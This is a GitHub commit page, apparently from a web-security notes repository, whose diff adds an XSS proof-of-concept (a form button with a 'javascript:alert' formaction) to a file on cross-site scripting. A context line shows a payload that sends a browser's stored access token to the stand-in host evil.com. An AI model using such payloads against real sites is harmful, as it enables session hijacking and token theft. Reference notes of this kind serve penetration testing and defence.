Skip to content

Commit

Permalink
add xss
Browse files Browse the repository at this point in the history
  • Loading branch information
xanhacks committed Aug 14, 2024
1 parent d383e52 commit a66c438
Showing 1 changed file with 4 additions and 0 deletions.
4 changes: 4 additions & 0 deletions content/docs/client-side/xss.md
Original file line number Diff line number Diff line change
Expand Up @@ -41,6 +41,10 @@ document.location='//evil.com?t='.concat(localStorage.getItem('access_token'));

- HTML entity list: [Named character references](https://html.spec.whatwg.org/multipage/named-characters.html#named-character-references)

```html
<form><button formaction="javascript:alert(document.domain)">CICK ME</button></form>
```

### Basic filter bypass

```html
Expand Down

0 comments on commit a66c438

Please sign in to comment.